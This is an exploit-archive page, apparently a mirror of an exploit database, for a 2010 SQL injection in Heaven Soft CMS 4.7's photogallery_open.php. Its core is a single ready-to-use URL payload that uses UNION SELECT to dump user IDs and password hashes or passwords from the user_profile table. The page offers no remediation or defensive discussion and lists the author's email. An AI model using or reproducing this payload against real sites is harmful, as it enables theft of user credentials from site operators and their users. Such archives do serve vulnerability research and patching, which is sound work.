[] NeoSense
E X P L O I T S
title author type platform port cve id

Heaven Soft CMS 4.7 - 'photogallery_open.php' SQL Injection

Author: CoBRa_21
type: webapps
platform: php
port: 
date_added: 2010-05-13 
date_updated:  
verified: 0 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 
-------------------------------------------------------------------------------------------

Heaven Soft CMS v 4.7 (photogallery_open.php) SQL Injection Vulnerability

-------------------------------------------------------------------------------------------

Author: CoBRa_21

Mail: uyku_cu@windowslive.com

Script Home: http://www.heavensoft.com.pk/

-------------------------------------------------------------------------------------------

Sql Injection:

http://localhost/[path]/photogallery_open.php?cid=-10%20union%20select%20group_concat%28user_id,0x3a,password%29+from+user_profile--

-------------------------------------------------------------------------------------------

Melekler Bize Aglar , Biz Halimize Guleriz......
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.